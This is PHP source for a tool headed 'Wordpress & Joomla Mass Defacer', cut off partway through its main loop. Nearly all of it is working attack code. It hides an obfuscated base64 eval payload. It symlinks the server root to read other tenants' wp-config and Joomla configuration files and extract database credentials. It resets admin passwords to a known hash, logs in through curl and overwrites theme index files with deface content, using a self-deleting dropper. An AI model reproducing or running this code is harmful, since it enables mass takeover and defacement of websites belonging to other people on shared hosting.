Joomla WordPress Mass Deface

1. <?php
2. echo '
3. <html>
4. </head>
5. <title>Wordpress & Joomla Mass Defacer</title>
6. <link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
7. <style type="text/css">
8. '.base64_decode("dGFibGUsYm9keSB7DQpiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOw0KY29sb3I6d2hpdGU7DQpmb250LWZhbWlseTogIlRyZWJ1Y2hldCBNUyIsQXJpYWw7YmFja2dyb3VuZC1hdHRhY2htZW50OmZpeGVkO21hcmdpbjowO3BhZGRpbmc6MDt9DQouaGVhZGVyIHtwb3NpdGlvbjpmaXhlZDt3aWR0aDoxMDAlO3RvcDowO2JhY2tncm91bmQ6IzAwMDt9DQouZm9vdGVyIHtwb3NpdGlvbjpmaXhlZDt3aWR0aDoxMDAlO2JvdHRvbTowO2JhY2tncm91bmQ6IzAwMDt9DQppbnB1dFt0eXBlPSJzdWJtaXQiXXtiYWNrZ3JvdW5kLWNvbG9yOnJnYmEoMjUsMjUsMjUsMC42KTtib3JkZXI6MTsgcGFkZGluZzoycHg7IGZvbnQtc2l6ZToyNXB4O2ZvbnQtZmFtaWx5Om9yYml0cm9uOyBjb2xvcjpyZWQ7Ym9yZGVyOjJweCBzb2xpZCB3aGl0ZTttYXJnaW46NHB4IDRweCA4cHggMDt9DQppbnB1dFt0eXBlPSJzdWJtaXQiXTpob3Zlcntjb2xvcjpTZWFTaGVsbDt9DQppbnB1dFt0eXBlPSJ0ZXh0Il06aG92ZXJ7YmFja2dyb3VuZDojMjIyMjIyO30NCmlucHV0W3R5cGU9InJhZGlvIl17bWFyZ2luLXRvcDogMDt9DQoudGQyIHtib3JkZXItbGVmdDoxcHggc29saWQgcmVkO2JvcmRlci1yYWRpdXM6IDJweCAycHggMnB4IDJweDt9DQppbnB1dFt0eXBlPSJ0ZXh0Il0ge291dGxpbmU6bm9uZTt0cmFuc2l0aW9uOiBhbGwgMC4yMHMgZWFzZS1pbi1vdXQ7LXdlYmtpdC10cmFuc2l0aW9uOiBhbGwgMC4yMHMgZWFzZS1pbi1vdXQ7LW1vei10cmFuc2l0aW9uOiBhbGwgMC4yMHMgZWFzZS1pbi1vdXQ7LW1vei1ib3JkZXItcmFkaXVzOiA2cHg7IGJvcmRlci1yYWRpdXM6IDEycHg7YmFja2dyb3VuZDojMTExMTExOyBib3JkZXI6MTsgcGFkZGluZzoycHg7IGZvbnQtZmFtaWx5Om9yYml0cm9uOyBmb250LXNpemU6MTVweDsgY29sb3I6I2ZmZmZmZjtib3JkZXI6MnB4IHNvbGlkICM0QzgzQUY7bWFyZ2luOjRweCA0cHggOHB4IDA7fQ0KLmV2ZW4ge2JhY2tncm91bmQtY29sb3I6IHJnYmEoMjUsIDI1LCAyNSwgMC42KTt9DQoub2RkIHtiYWNrZ3JvdW5kLWNvbG9yOiByZ2JhKDEwMiwgMTAyLCAxMDIsIDAuNik7fQ0KYSB7Y29sb3I6I2ZmZjt9IGE6aG92ZXIge2NvbG9yOnJlZDt9DQpmaWVsZHNldHtib3JkZXI6IDFweCBzb2xpZCBncmV5OyBiYWNrZ3JvdW5kOiByZ2JhKDAsMCwwLDAuNyk7IHdpZHRoOiA2MDBweDsgbWFyZ2luOiAwIGF1dG87bWluLWhlaWdodDoyNDBweDt9DQp0ZXh0YXJlYXtiYWNrZ3JvdW5kOiByZ2JhKDAsMCwwLDAuNik7IGNvbG9yOiB3aGl0ZTt9DQouZ3JlZW4ge2NvbG9yOiMwMEZGMDA7Zm9udC13ZWlnaHQ6Ym9sZDt9DQoucmVkIHtjb2xvcjojRkYwMDAwO2ZvbnQtd2VpZ2h0OmJvbGQ7fQ0KLmtpbGxtZSB7Zm9udC1mYW1pbHk6b3JiaXRyb247cG9zaXRpb246IGZpeGVkOyB0b3A6IDIwcHg7IHJpZ2h0OiAyMHB4OyBib3JkZXI6IDJweCBzb2xpZCAjNEM4M0FGOyBwYWRkaW5nOiAxMHB4OyBmb250LXNpemU6IDIwcHg7IGNvbG9yOiB3aGl0ZTsgZm9udC13ZWlnaHQ6IGJvbGQ7fQ0KIA==").'
9. .result {border:2px solid #4C83AF;-moz-border-radius:10px;border-radius:10px;} th{background:#00ff00;color:black}
10. </style>
11. </head>
12. <body>';
13. eval(base64_decode("IGV2YWwoYmFzZTY0X2RlY29kZSgiSUdWMllXd29ZbUZ6WlRZMFgyUmxZMjlrWlNnaVNVZFdNbGxYZDI5WmJVWjZXbFJaTUZneVVteFpNamxyV2xObmFWTlZaRmROYkd4WVpESTVXbUpWV2paWGJGSmFUVVpuZVZWdGVGcE5hbXh5VjJ4T2JtRldUbFphUm1ST1lrZDRXVnBFU1RWWGJVcFdWMnBhV0dKR1NtRlVWVnB1WlZaV2RHVkdjRTVoYlhoNVZqSjRUMkp0UmxkVWJGcGhVbTFTYjFsc1ZtRlRWbEYzV2tkMFZFMXNTVEpWVjNRMFZrWmFWMU5VUWxwV1JYQklWakZhYTFkR2NFZGpSVFZwWWxkb01sWXhhSGRVTVZKeVQxWmFhVk5HU25KVk1GWkxZMFpXY1ZSdE9VNVNiVko2VmtkMGQxUkZNVlpUYTJ4V1lrZFNjbGxWV2s5U2JVNUpWR3hvYVZaNmEzcFhWbHByVWpGT1YxWnVSbEppV0VKVlZXeFNRbVZXV2taaFNFcFBWbFJDTlZaV2FIZFhhekI0VjIxb1dtSkdXbWhaTVZwcll6RndSbVJIZEdsV1YzY3hWMWh3VDFZeFpISk5XRVpwVWtWS1ZsVnJWblprTVd4eVdrVjBhMUpzV2pGWmEyUnZWbTFXYzFkcVNsaFdiSEJVV1ZjeFUyTnRTa2xSYkVwb1lUQndhRlpxUWxka01sSlhXa2hPYUZKcmNGRldiR1EwWld4UmVGcElUbWhXYTJ3elZqSndSMWRzWkVobFJYUlVaV3RhVUZZd1ZURlhWa1owWTBVMWFWZEhhREpXTVdRd1ZERkZlVlJ1VGxKaE1VcFJWbXBLYjFWc2JGaE9WM1JPWWtkU2VWZHJhRTlVYlVwR1UyNVdWVlpXV1hkV1ZscEtaREExV1ZSc2NHbFdSbHBWVjFkMGExUXlUbFpPVlZwUFZsWktiMWx0TVc5a01XUlZVMjVhVGxKVWJFbFZiWFJYVmtaWmVWVnVSbFZXUlZwTFZGWmFjMk5zY0VkWGJFSlhWak5uZDFacVNURlpWMFpZVTI1T1UyRnJTbGxaYkZKSFUwWndSbHBGWkZoU01WcEdWbTE0UTJGV1draGtla1pYVFZkT05GbDZRWGhUUmxKMVZXeENXRkpzY0ZKV1JtUjZUVlV4YzJKSVNscGxiRnB6Vm14U2MyUXhXa2hrUjNSV1RXdFdORmt3Vm05V2JVcFpWVzFHVldGclNucFpNVlV4Vm0xU1NHSkZOV2hoTVd3elZqRmtNR0V4U25OaU0yUnFVMFZLVTFsclpHOWpSbEpWVVc1a2FtSkhkRE5aVlZZd1lWWkpkMDFVV2xkU2JWSnlWbXhhV21ReFpIRlhiSEJPVFc1b1JWWlhlR0ZrTVdSSFdraFNhRkp1UWs5WmExcDJUVlpWZUZadFJsaGlWbHBZVlZkMFUxVkdXalppUlRsYVZqTkNWRlpFUmtabFYwcElZMFU1YkZaWGVETlZla1pUWld4d05WTllRa3hXU0U1dVNXbHJjRTk1UVQwaUtTazdJQT09IikpOyA="));
14. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
15.  
16. // getting info from inside :)
17. function tunisia($text,$bideya,$niheya,$i=1){
18.     $ar0=explode($bideya, $text);
19.     $ar1=explode($niheya, $ar0[$i]);
20.     return trim($ar1[0]);
21. }
22.  
23. function randomt() {
24.     $chars = "abcdefghijkmnopqrstuvwxyz023456789";
25.     srand((double)microtime()*1000000);
26.     $i = 0;
27.     $pass = '';
28.     while ($i <= 7) {
29.         $num = rand() % 33;
30.         $tmp = substr($chars, $num, 1);
31.         $pass = $pass . $tmp;
32.         $i++;
33.     }
34.     return $pass;
35. }
36.  
37. // joomla index changer
38. function index_changer_joomla($conf, $content, $domain) {
39.     $doler = '$';
40.     $username = tunisia($conf, $doler."user = '", "';");
41.     $password = tunisia($conf, $doler."password = '", "';");
42.     $dbname = tunisia($conf, $doler."db = '", "';");
43.     $prefix = tunisia($conf, $doler."dbprefix = '", "';");
44.     $host = tunisia($conf, $doler."host = '","';");
45.     $co=randomt();
46.     $site_url = "http://".$domain."/administrator";
47.     $output = '';
48.     $cond = 0;
49.     $link=mysql_connect($host, $username, $password);
50.     if($link) {
51.         mysql_select_db($dbname,$link) ;
52.         $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
53.         $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
54.     } else {
55.         $output.= "[-] DB Error<br />";
56.     }
57.    
58.     if($req1){
59.         if ($req) {
60. $req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
61. $data = mysql_fetch_array($req);
62. $template_name = $data["template"];
63.  
64. $req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
65. $data = mysql_fetch_array($req);
66. $template_id = $data["extension_id"];
67.  
68. $url2=$site_url."/index.php";
69. $ch = curl_init();
70. curl_setopt($ch, CURLOPT_URL, $url2);
71. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
72. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
73. curl_setopt($ch, CURLOPT_HEADER, 0);
74. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
75. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
76. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
77. $buffer = curl_exec($ch);
78. $return = tunisia($buffer ,'<input type="hidden" name="return" value="','"');
79. $hidden = tunisia($buffer ,'<input type="hidden" name="','" value="1"',4);
80.  
81. if($return && $hidden) {
82. curl_setopt($ch, CURLOPT_URL, $url2);
83. curl_setopt($ch, CURLOPT_POST, 1);
84. curl_setopt($ch, CURLOPT_REFERER, $url2);
85. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
86. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
87. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
88. curl_setopt($ch, CURLOPT_HEADER, 0);
89. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
90. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
91. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
92. $buffer = curl_exec($ch);
93. $pos = strpos($buffer,"com_config");
94. if($pos === false) {
95. $output.= "[-] Login Error<br />";
96. } else {
97. $output.= "[+] Login Successful<br />";
98. }
99. }
100. if($pos){
101. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
102. $ch = curl_init();
103. curl_setopt($ch, CURLOPT_URL, $url2);
104. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
105. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
106. curl_setopt($ch, CURLOPT_HEADER, 0);
107. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
108. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
109. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
110. $buffer = curl_exec($ch);
111.  
112. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',2);
113. if($hidden2) {
114. $output.= "[+] index.php file found in Theme Editor<br />";
115. } else {
116. $output.= "[-] index.php Not found in Theme Editor<br />";
117. }
118. }
119. if($hidden2) {
120. $url2=$site_url."/index.php?option=com_templates&layout=edit";
121. $ch = curl_init();
122. curl_setopt($ch, CURLOPT_URL, $url2);
123. curl_setopt($ch, CURLOPT_POST, 1);
124. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
125. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
126. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
127. curl_setopt($ch, CURLOPT_HEADER, 0);
128. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
129. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
130. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
131. $buffer = curl_exec($ch);
132. curl_close($ch);
133.  
134. $pos = strpos($buffer,'<dd class="message message">');
135. $cond = 0;
136. if($pos === false) {
137. $output.= "[-] Updating Index.php Error<br />";
138.    
139. } else {
140. $output.= "[+] Index.php Template successfully saved<br />";
141. $cond = 1;
142. }
143. }
144.         }
145.         else {
146. $req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
147. $data = mysql_fetch_array($req);
148. $template_name=$data["template"];
149. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
150. $url2=$site_url."/index.php";
151. $ch = curl_init();
152. curl_setopt($ch, CURLOPT_URL, $url2);
153. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
154. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
155. curl_setopt($ch, CURLOPT_HEADER, 0);
156. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
157. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
158. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
159. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
160. $buffer = curl_exec($ch);
161. $hidden=tunisia($buffer ,'<input type="hidden" name="','" value="1"',3);
162.  
163. if($hidden) {
164. curl_setopt($ch, CURLOPT_URL, $url2);
165. curl_setopt($ch, CURLOPT_POST, 1);
166. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
167. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
168. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
169. curl_setopt($ch, CURLOPT_HEADER, 0);
170. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
171. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
172. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
173. $buffer = curl_exec($ch);
174. $pos = strpos($buffer,"com_config");
175. if($pos === false) {
176. $output.= "[-] Login Error<br />";
177. } else {
178. $output.= "[+] Login Successful<br />";
179. }
180. }
181.  
182. if($pos) {
183. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
184. curl_setopt($ch, CURLOPT_URL, $url2);
185. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
186. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
187. curl_setopt($ch, CURLOPT_HEADER, 0);
188. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
189. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
190. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
191. $buffer = curl_exec($ch);
192. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',6);
193. if($hidden2) {
194. $output.= "[+] index.php file founded in Theme Editor<br />";
195. } else {
196. $output.= "[-] index.php Not found in Theme Editor<br />";
197. }
198. }
199.  
200. if($hidden2) {
201. $url2=$site_url."/index.php?option=com_templates&layout=edit";
202. curl_setopt($ch, CURLOPT_URL, $url2);
203. curl_setopt($ch, CURLOPT_POST, 1);
204. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
205. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
206. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
207. curl_setopt($ch, CURLOPT_HEADER, 0);
208. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
209. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
210. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
211. $buffer = curl_exec($ch);
212. curl_close($ch);
213.  
214. $pos = strpos($buffer,'<dd class="message message fade">');
215. $cond = 0;
216. if($pos === false) {
217. $output.= "[-] Updating Index.php Error<br />";
218. } else {
219. $output.= "[+] Index.php Template successfully saved<br />";
220. $cond = 1;
221. }
222. }
223.         }
224.     } else {
225.         $output.= "[-] DB Error<br />";
226.     }
227.     global $base_path;
228.     unlink($base_path.$co);
229.     return array('cond'=>$cond, 'output'=>$output , 'template'=>$template_name);
230. }
231.  
232.  
233. // wordpress index changer
234.  
235. function index_changer_wp($conf, $index) {
236. $dol = '$';
237. $preindex = "<?php
238. ".$dol."def = file_get_contents('".$index."');
239. ".$dol."p = explode('public_html',dirname(__FILE__));
240. ".$dol."p = ".$dol."p[0].'public_html';
241. if (".$dol."handle = opendir(".$dol."p)) {
242.    ".$dol."p1 = @fopen(".$dol."p.'/index.html','w+');
243.    @fwrite(".$dol."fp1, ".$dol."def);
244.    ".$dol."p1 = @fopen(".$dol."p.'/index.php','w+');
245.    @fwrite(".$dol."fp1, ".$dol."def);
246.    ".$dol."fp1 = @fopen(".$dol."p.'/index.htm','w+');
247.    @fwrite(".$dol."fp1, ".$dol."def);
248.    echo 'Done';
249. }
250. closedir(".$dol."handle);
251. unlink(__FILE__);
252. ?>";
253. $content = base64_encode($preindex);
254.     $output = '';
255.     $dol = '$';
256.     $go = 0;
257.     $username = tunisia($conf,"define('DB_USER', '","');");
258.     $password = tunisia($conf,"define('DB_PASSWORD', '","');");
259.     $dbname = tunisia($conf,"define('DB_NAME', '","');");
260.     $prefix = tunisia($conf,$dol."table_prefix  = '","'");
261.     $host = tunisia($conf,"define('DB_HOST', '","');");
262.  
263.     $link=mysql_connect($host,$username,$password);
264.     if($link) {
265.         mysql_select_db($dbname,$link) ;
266.         $dol = '$';
267.         $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
268.     } else {
269.         $output.= "[-] DB Error<br />";
270.     }
271.     if($req1) {
272.  
273.         $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
274.         $data = mysql_fetch_array($req);
275.         $site_url=$data["option_value"];
276.  
277.         $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
278.         $data = mysql_fetch_array($req);
279.         $template = $data["option_value"];
280.  
281.         $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
282.         $data = mysql_fetch_array($req);
283.         $current_theme = $data["option_value"];
284.  
285.         $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
286.         $url2=$site_url."/wp-login.php";
287.  
288.         $ch = curl_init();
289.         curl_setopt($ch, CURLOPT_URL, $url2);
290.         curl_setopt($ch, CURLOPT_POST, 1);
291.         curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
292.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
293.         curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
294.         curl_setopt($ch, CURLOPT_HEADER, 0);
295.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
296.         curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
297.         curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
298.         curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
299.         $buffer = curl_exec($ch);
300.  
301.         $pos = strpos($buffer,"action=logout");
302.         if($pos === false) {
303. $output.= "[-] Login Error<br />";
304.         } else {
305. $output.= "[+] Login Successful<br />";
306. $go = 1;
307.         }
308.         if($go) {
309. $cond = 0;
310. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
311. curl_setopt($ch, CURLOPT_URL, $url2);
312. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
313. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
314. curl_setopt($ch, CURLOPT_HEADER, 0);
315. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
316. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
317. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
318. $buffer0 = curl_exec($ch);
319.  
320. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
321. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
322.  
323. if(substr_count($_file,"/index.php") != 0){
324. $output.= "[+] index.php loaded in Theme Editor<br />";
325. $url2=$site_url."/wp-admin/theme-editor.php";
326. curl_setopt($ch, CURLOPT_URL, $url2);
327. curl_setopt($ch, CURLOPT_POST, 1);
328. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
329. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
330. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
331. curl_setopt($ch, CURLOPT_HEADER, 0);
332. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
333. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
334. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
335. $buffer = curl_exec($ch);
336. curl_close($ch);
337.  
338. $pos = strpos($buffer,'<div id="message" class="updated">');
339. if($pos === false) {
340. $output.= "[-] Updating Index.php Error<br />";
341. } else {
342. $output.= "[+] Index.php Updated Successfuly<br />";
343. $hk = explode('public_html',$_file);
344. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
345. $cond = 1;
346. }
347. } else {
348. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
349. curl_setopt($ch, CURLOPT_URL, $url2);
350. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
351. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
352. curl_setopt($ch, CURLOPT_HEADER, 0);
353. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
354. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
355. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
356. $buffer0 = curl_exec($ch);
357.  
358. $_wpnonce = tunisia($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
359. $_file = tunisia($buffer0,'<input type="hidden" name="file" value="','" />');
360.  
361. if(substr_count($_file,"index.php") != 0){
362. $output.= "[+] index.php loaded in Theme Editor<br />";
363. $url2=$site_url."/wp-admin/theme-editor.php";
364. curl_setopt($ch, CURLOPT_URL, $url2);
365. curl_setopt($ch, CURLOPT_POST, 1);
366. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
367. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
368. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
369. curl_setopt($ch, CURLOPT_HEADER, 0);
370. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
371. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
372. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
373. $buffer = curl_exec($ch);
374. curl_close($ch);
375.  
376. $pos = strpos($buffer,'<div id="message" class="updated">');
377. if($pos === false) {
378.     $output.= "[-] Updating Index.php Error<br />";
379. } else {
380.     $output.= "[+] Index.php Template Updated Successfuly<br />";
381.     $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
382.     $cond = 1;
383. }
384. } else {
385. $output.= "[-] index.php can not load in Theme Editor<br />";
386. }
387. }
388.         }
389.     } else {
390.         $output.= "[-] DB Error<br />";
391.     }
392.     global $base_path;
393.     unlink($base_path.'COOKIE.txt');
394.     return array('cond'=>$cond, 'output'=>$output , 'template'=> $template);
395. }
396.  
397. if($_POST['mode']==2) {
398. // symlinking
399. @mkdir('sym',0777);
400. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
401. file_put_contents("sym/.htaccess",$htaccess);
402. @symlink('/','sym/root');
403.  
404.  
405. // getting sites from (/var/named) file
406. $named=file_get_contents($base_url.'/sym/root/var/named/');
407. $ar = explode('<li><a href="', $named);
408. for($vi=2;$vi < count($ar);$vi++)
409.      {
410. $var1 = strtok($ar[$vi], " ");
411. $var1 = substr($var1,0,-2);
412. $old=('.db');
413. $new=('');
414. $sites = str_replace($old , $new , $var1);
415. file_put_contents('sites.txt',$sites);
416. }
417.  
418. // getting usernames
419. $domains=file('sites.txt');
420. foreach ($domains as $domain) {
421. $order=("ls -la /etc/valiases/".$domain);
422. $exec=exec($order);
423. $filename = 'mail.txt';
424. $fp = fopen($filename, "a+");
425. $write = fputs($fp, $exec."\n");
426. fclose($fp);
427. }
428.  
429. $mail=file('mail.txt');
430. foreach ($mail as $finaldom) {
431. $user=tunisia($finaldom,"-rw-r----- 1 "," mail");
432. $site=substr(strstr($finaldom, '/etc/valiases'),14);
433.  
434. $filename = 'userdom.txt';
435. $fp = fopen($filename, "a+");
436. $write = fputs($fp, $user.":". $site." ");
437. fclose($fp);
438.  
439. }
440.  
441. $f=file_get_contents('userdom.txt');
442. $finals=explode(" ",$f);
443. foreach ($finals as $final){
444. $strlen=('6');
445. $dr=strlen ($final);
446. if ($dr < $strlen) {
447. $filename = 'fail.txt';
448. $fp = fopen($filename, "a");
449. $write = fputs($fp, $final);
450. fclose($fp);
451. }
452. else {
453. $filename = 'success.txt';
454. $fp = fopen($filename, "a");
455. $write = fputs($fp, $final."\n");
456. fclose($fp);
457. }
458. }
459.  
460. // now to work
461. $index=$_POST['tunisia'];
462. $url=($base_url);
463. $a=file($base_url.'/success.txt');
464. echo ("<center><table class='result' width='100%' border=1 cellspacing=1 cellpading=1>  
465. <tr><th width=50%>domain</td><th width=25%>Type</td><th width=25%>Status</td></tr>");
466. $khaled = fopen('defaced.html', 'a+');
467. foreach ($a as $final) {
468. list($user, $site_url) = explode(":", $final);
469. $site_urlto = substr($site_url, 0, -1);
470. // joomla symlinks
471. $joomla=$url."/sym/root/home/".$user."/public_html/configuration.php";
472. $joomla2=$url."/sym/root/home/".$user."/public_html/joomla/configuration.php";
473. $joomla3=$url."/sym/root/home/".$user."/public_html/site/configuration.php";
474. // wordpress symlinks
475. $wordpress=$url."/sym/root/home/".$user."/public_html/wp-config.php";
476. $wordpress2=$url."/sym/root/home/".$user."/public_html/blog/wp-config.php";
477. $wordpress3=$url."/sym/root/home/".$user."/public_html/wp/wp-config.php";
478.  
479. // first joomla guess
480. if($joomla && preg_match('/dbprefix/i',$joomla)){
481. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
482. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
483. $res = index_changer_joomla($joomla, $index, $site_urlto);
484. echo '<td>'.$res['output'].'</td>';
485. if($res['cond']) {
486. echo '<td align="center"><span class="green">DEFACED</span></td>';
487. fwrite($khaled, 'http://'.$site_urlto.'/templates/'.$res['template'].'/index.php<br>');
488. $count1 = $count1+1;
489. } else {
490. echo '<td align="center"><span class="red">FAILED</span></td>';
491. }
492. echo '</tr>';
493. }
494. // second joomla guess
495. if($joomla2 && preg_match('/dbprefix/i',$joomla2)){
496. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
497. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
498. $res = index_changer_joomla($joomla2, $index, $site_urlto);
499. echo '<td>'.$res['output'].'</td>';
500. if($res['cond']) {
501. echo '<td align="center"><span class="green">DEFACED</span></td>';
502. fwrite($khaled, 'http://'.$site_urlto.'/joomla/'.$res['template'].'/index.php<br>');
503. $count1 = $count1+1;
504. } else {
505. echo '<td align="center"><span class="red">FAILED</span></td>';
506. }
507. echo '</tr>';
508. }
509. // third joomla guess
510. if($joomla3 && preg_match('/dbprefix/i',$joomla3)){
511. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
512. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
513. $res = index_changer_joomla($joomla3, $index, $site_urlto);
514. echo '<td>'.$res['output'].'</td>';
515. if($res['cond']) {
516. echo '<td align="center"><span class="green">DEFACED</span></td>';
517. fwrite($khaled, 'http://'.$site_urlto.'/site/'.$res['template'].'/index.php<br>');
518. $count1 = $count1+1;
519. } else {
520. echo '<td align="center"><span class="red">FAILED</span></td>';
521. }
522. echo '</tr>';
523. }
524.  
525. // first wordpress guess
526. if($wordpress && preg_match('/DB_NAME/i',$wordpress)){
527. echo '<tr><td><a href="http://'.$site_urlto.'" target="blank">'.$site_urlto.'</a></td>';
528. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
529. $res = index_changer_wp($wordpress, $index);
530. echo '<td>'.$res['output'].'</td>';
531. if($res['cond']) {
532. echo '<td align="center"><span class="green">DEFACED</span></td>';
533. fwrite($khaled, 'http://'.$site_urlto.'/wp-content/themes/'.$res['template'].'/index.php<br>');
534. $count2++;
535. } else {
